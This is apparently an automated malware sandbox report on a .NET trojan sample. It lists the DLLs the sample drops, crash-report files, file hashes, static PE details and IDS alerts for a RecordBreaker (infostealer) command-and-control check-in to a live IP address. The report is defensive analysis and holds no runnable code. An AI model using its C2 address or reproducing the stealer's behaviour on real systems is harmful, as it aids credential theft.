C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_5ebb57bd92d22f78fe98373a7ac393ea4d1fd2_e15faf63_4c96da8a-481f-4c37-9b32-0f3fff7b9979\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9198732012537373
Encrypted:	false
SSDEEP:	96:yqFhQw3twSwJ6stwWv7qlzxTMbfGQXIDcQvc6QcEVcw3cE/9VwQVwQ+BHUHZ0owJ:JDF26aGpc0BU/aaGvzuiFKZ24IO8h
MD5:	09D797AED62AEF5F356DB13BE3DFA973
SHA1:	95F1EE3BADBDB23C276A8D0FB9F99773153F6186
SHA-256:	DDCA5076E6601990823AC27232C7FC9DE9CCC40271AD7B4F826961AE7A158670
SHA-512:	13D48995623B3D3F0F6EBFD83C046D023A9C9E5F55DC26DC233A47AC0674F30780FD87012CB2628C7D118974790D7B97912CBB618A784905DBD729E90530EBC9
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.1.9.2.2.3.2.0.4.6.7.5.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.6.1.9.2.2.3.2.7.9.6.7.5.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.9.6.d.a.8.a.-.4.8.1.f.-.4.c.3.7.-.9.b.3.2.-.0.f.3.f.f.f.7.b.9.9.7.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.6.c.a.3.6.7.-.3.8.7.b.-.4.0.1.e.-.9.5.7.3.-.4.7.2.6.3.c.c.f.f.3.1.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.3.2...T.r.o.j.a.n.X.-.g.e.n...1.8.1.3.7...2.2.4.3.8...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.i.r.d.i.n.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.f.8.-.0.0.0.1.-.0.0.1.4.-.6.1.6.6.-.d.7.5.6.d.c.8.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.4.2.7.3.f.a.4.7.5.8.9.1.c.6.5.2.c.3.5.0.9.2.e.f.c.a.c.5.7.0.4.0.0.0.0.0.0.0.0.!.0.0.0.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1262.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Mar 29 13:23:52 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	142944
Entropy (8bit):	3.4071734160090608
Encrypted:	false
SSDEEP:	1536:ybAFy/hEKniCDOG+ySXr2tpN4uE2aO97LTgKhvuJOs+keyO5ut+I:7AZOxVXrQ4uEqRLTgKh
MD5:	AFCEE5D59F5864D0EF0D61700BEC3EC5
SHA1:	2CBC9C660ED6205B9D0CA69A7723E3E2C8BCCBD3
SHA-256:	19D0C8A53C5C9263AFD17084E1DCC4EBFE79F395BAE3333A65EAC83346709E54
SHA-512:	2CC573E35989E4C19D905BE8F00BC0FB886DA0A04C629C58DC81A4123651DF442A595E3BE83163B532EDA089799812AA299C50983D53D86425D04DA9AF7C8BAA
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f........................4...........$...........d...^8..........`.......8...........T............&..........................................................................................................eJ......t.......GenuineIntel............T..............f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER14A5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8472
Entropy (8bit):	3.7062136444247042
Encrypted:	false
SSDEEP:	192:R6l7wVeJkI6ZZ6YNrSU9lGgmfJ4JJpr789b65sfdem:R6lXJb6ZZ6YxSU9UgmfJ4JI6Sf9
MD5:	E2AECD82F752C784E3BD68BECA96C6F4
SHA1:	6A21DDB41E94917F16C84D9ABB8EE8AF7C4957F1
SHA-256:	24F2F536A377001494677BAAD6B99F1CF6AD3FB5F5F7AAEE2C66A2C65D78EDDE
SHA-512:	7550113B985DFA838FA305C9457F38E4307568D0014DCF22BB0713E847070A27D987964E0738FEB3F4F1FE8F57C4AC306E0C95547C4B26FA0135A80341153E04
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.0.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER14C5.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4837
Entropy (8bit):	4.5645399496261385
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg77aI9YrWpW8VYFYm8M4JYfGAFS+q8xDeHSASMd:uIjfaI7Sa7VlJtry7Md
MD5:	A07D48A7109E1B58CD8D314107373BC3
SHA1:	0453BD48997F73E08B67FD348A4F4ECCC82EB0C4
SHA-256:	31D3040A96F25C10DE862C8FA24202A5325B223FB2861F0F1F726D6AD1865EBC
SHA-512:	2B23079EE99E5F39D3DBD954B12FF475FFF1963548C13FB186C68CAA289A4F044EC2BEB982D12A96C6FFA7562578E26D8218C4EF0722AB7C3EAD433C1642D2CE
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="256586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\LocalLow\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	684984
Entropy (8bit):	6.857030838615762
Encrypted:	false
SSDEEP:	12288:0oUg2twzqWC4kBNv1pMByWk6TYnhCevOEH07OqHM65BaFBuY3NUNeCLIV/Rqnhab:0oUg2tJWC44WUuY3mMCLA/R+hw
MD5:	15B61E4A910C172B25FB7D8CCB92F754
SHA1:	5D9E319C7D47EB6D31AAED27707FE27A1665031C
SHA-256:	B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
SHA-512:	7C1C982A2B597B665F45024A42E343A0A07A6167F77EE428A203F23BE94B5F225E22A270D1A41B655F3173369F27991770722D765774627229B6B1BBE2A6DC3F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: SnI2yBH5jJ.exe, Detection: malicious, Browse Filename: K3lQsBC5we.exe, Detection: malicious, Browse Filename: TCr4xC4lxh.exe, Detection: malicious, Browse Filename: o6zadjW4dI.exe, Detection: malicious, Browse Filename: 9eb062155df6ea9f702aa6a32aa414bd1c2c7c2b1fad3.exe, Detection: malicious, Browse Filename: 8f3f4f5ad819dc17618e1389476ca8e8f9d332196f64b.exe, Detection: malicious, Browse Filename: f81795c9da60984703aeb170967d4bcc9fa1512c03623.exe, Detection: malicious, Browse Filename: 7a6ef55d260d003bef719a97408c302faf33f7a7b9f1f.exe, Detection: malicious, Browse Filename: 47e12c36a9b6477267c4bc403855aff35a346ff0ef432.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.9b.........."!.........6...........................................................@A........................4,..S....,..........x............T..........8$...&...............................0..................D............................text............................... ..`.rdata.......0......................@..@.data...<F...@.......&..............@....00cfg...............(..............@..@.rsrc...x............*..............@..@.reloc..8$.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	627128
Entropy (8bit):	6.792651884784197
Encrypted:	false
SSDEEP:	12288:dfsiG5KNZea77VUHQqROmbIDm0ICRfCtbtEE/2OH9E2ARlZYSd:df53NZea3V+QqROmum0nRKx79E2ARlrd
MD5:	F07D9977430E762B563EAADC2B94BBFA
SHA1:	DA0A05B2B8D269FB73558DFCF0ED5C167F6D3877
SHA-256:	4191FAF7E5EB105A0F4C5C6ED3E9E9C71014E8AA39BBEE313BC92D1411E9E862
SHA-512:	6AFD512E4099643BBA3FC7700DD72744156B78B7BDA10263BA1F8571D1E282133A433215A9222A7799F9824F244A2BC80C2816A62DE1497017A4B26D562B7EAF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: SnI2yBH5jJ.exe, Detection: malicious, Browse Filename: K3lQsBC5we.exe, Detection: malicious, Browse Filename: TCr4xC4lxh.exe, Detection: malicious, Browse Filename: o6zadjW4dI.exe, Detection: malicious, Browse Filename: 9eb062155df6ea9f702aa6a32aa414bd1c2c7c2b1fad3.exe, Detection: malicious, Browse Filename: 8f3f4f5ad819dc17618e1389476ca8e8f9d332196f64b.exe, Detection: malicious, Browse Filename: f81795c9da60984703aeb170967d4bcc9fa1512c03623.exe, Detection: malicious, Browse Filename: 7a6ef55d260d003bef719a97408c302faf33f7a7b9f1f.exe, Detection: malicious, Browse Filename: 47e12c36a9b6477267c4bc403855aff35a346ff0ef432.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........V......./....................................................@A............................cQ......,....p...............r..........4C...........................W......h0...............................................text............................... ..`.rdata.......0......................@..@.data........0......................@....00cfg.......P....... ..............@..@.tls.........`......."..............@....rsrc........p.......$..............@..@.reloc..4C.......D..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	449280
Entropy (8bit):	6.670243582402913
Encrypted:	false
SSDEEP:	12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
MD5:	1FB93933FD087215A3C7B0800E6BB703
SHA1:	A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
SHA-256:	2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
SHA-512:	79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2042296
Entropy (8bit):	6.775178510549486
Encrypted:	false
SSDEEP:	49152:6dvFywfzFAF7fg39IwA49Kap9bGt+qoStYnOsbqbeQom7gN7BpDD5SkIN1g5D92+:pptximYfpx8OwNiVG09
MD5:	F67D08E8C02574CBC2F1122C53BFB976
SHA1:	6522992957E7E4D074947CAD63189F308A80FCF2
SHA-256:	C65B7AFB05EE2B2687E6280594019068C3D3829182DFE8604CE4ADF2116CC46E
SHA-512:	2E9D0A211D2B085514F181852FAE6E7CA6AED4D29F396348BEDB59C556E39621810A9A74671566A49E126EC73A60D0F781FA9085EB407DF1EEFD942C18853BE5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........&...............................................`............@A.........................!..\...T...@....@..x....................P..h...h...................................................\....!..@....................text...i........................... ..`.rdata..............................@..@.data....N.......*..................@....00cfg.......0......................@..@.rsrc...x....@......................@..@.reloc..h....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	254392
Entropy (8bit):	6.686038834818694
Encrypted:	false
SSDEEP:	6144:uI7A8DMhFE2PlKOcpHSvV6x/CHQyhvs277H0mhWGzTdtb2bbIFxW7zrM2ruyYz+h:uI7A8DMhFE2PlbcpSv0x/CJVUmhDzTvS
MD5:	63A1FE06BE877497C4C2017CA0303537
SHA1:	F4F9CBD7066AFB86877BB79C3D23EDDACA15F5A0
SHA-256:	44BE3153C15C2D18F49674A092C135D3482FB89B77A1B2063D01D02985555FE0
SHA-512:	0475EDC7DFBE8660E27D93B7B8B5162043F1F8052AB28C87E23A6DAF9A5CB93D0D7888B6E57504B1F2359B34C487D9F02D85A34A7F17C04188318BB8E89126BF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...'.9b.........."!......................................................................@A........................tv..S....w...................................5..hq..............................................D{...............................text...V........................... ..`.rdata..............................@..@.data................~..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sqlite3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1060864
Entropy (8bit):	6.475010293382691
Encrypted:	false
SSDEEP:	24576:9jxwSkSteuT4P/y7HjsXAGJyGvN5z4Rui2IXLv:9Vww8HyrjsvyWN54RZHb
MD5:	19148E68DDDE749ABCD1375F83E686BA
SHA1:	C2AEC8BD52BEEAFABC43B544BE8F0210B562C2BC
SHA-256:	3249E77C0AAB9A7117792E387A06F6348996819A7B625D5208D68A07C8C1AC44
SHA-512:	E5B8C52747FBD59F7D61C56E3A997DC198104A8586EA8101759371B5B5DE52A72A9446D8B355B4B8BDE71134C7EE5167AE193349BAF953123FE0257DFE04B9E5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".,b.v.........!......................... .....a......................................... .........................n................................... ...;...................................................................................text...............................`.P`.data...\|'... ...(..................@.`..rdata...D...P...F...:..............@.`@.bss....(.............................`..edata..n.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............&..............@.0B/70.....#............2..

C:\Users\user\AppData\LocalLow\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80128
Entropy (8bit):	6.906674531653877
Encrypted:	false
SSDEEP:	1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
MD5:	1B171F9A428C44ACF85F89989007C328
SHA1:	6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
SHA-256:	9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
SHA-512:	99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4169433181234785
Encrypted:	false
SSDEEP:	6144:Lcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuN75+:wi58oSWIZBk2MM6AFBho
MD5:	9A3E257DDF2ED8E59387501934C6A203
SHA1:	636A659FCB2B5F57C9255F36F4D7BA259C1C00E0
SHA-256:	CA92D736B64B614319FBB1EB5A8C675D1670DE8450DD64DA17EA38F3EA005F2D
SHA-512:	6BFA7547422AEB204E26794154A85E463B84B72BB5794543E1136FFDDF732255E255AA13FB92F05141353F5C5E2A7EA433BE514677837A35B566FB89DD09D091
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm*uKW...............................................................................................................................................................................................................................................................................................................................................P.]c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.995153215242869
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe
File size:	5'374'505 bytes
MD5:	20540ccd8f4132e0fff9daec9f143997
SHA1:	0fb2c50a19db4b8f2c6998e85b437780765fd61c
SHA256:	25f7e04b4c4fe0f1dc604270cbe8a53433580f9c5372f56abac420de4ced4322
SHA512:	4f299318f6e74e7e64e61d9e364327043289607f063c2972a3849c807de74ed30926ad1d19fd6906d57d4a04eb7df1ff635ec0ee9c2cb618820c3efc82ae0043
SSDEEP:	98304:Op01tlZUA6nDvod3HAslfqK1k20OWyCwSvNUddSLE9xmc+XXj0Mey6G8Qs:OpilgDvoBhFkvOWASirSLE9x+TZey6GQ
TLSH:	404633256ED36D0DE66B5BB31AD12BCF88BFB302672BAB2D005116250EE3915FF49131
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x42ba8e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6606A29F [Fri Mar 29 11:14:39 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2ba40	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x554	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2b9fc	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x29a94	0x29c00	dffa0efcbc9e988f42138496abeb3435	False	0.7255976328592815	data	7.031869268308508	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x554	0x600	aa6cc6ac619fb53f5ac97d63bb602af1	False	0.4095052083333333	data	3.9847064051533905	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2e000	0xc	0x200	dae04170f5f6cb6ca50b99e06bdf3547	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x2c0a0	0x2c8	data			0.45786516853932585
RT_MANIFEST	0x2c368	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/29/24-14:23:53.631287	TCP	2036934	ET TROJAN Win32/RecordBreaker CnC Checkin M1	49699	80	192.168.2.7	89.238.170.230
03/29/24-14:23:53.924786	TCP	2036955	ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response	80	49699	89.238.170.230	192.168.2.7

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2024 14:23:53.377482891 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:53.585309982 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:53.585402012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:53.631287098 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:53.850941896 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:53.924786091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:53.924809933 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:53.924823999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:53.924844980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:53.924865007 CET	49699	80	192.168.2.7	89.238.170.230
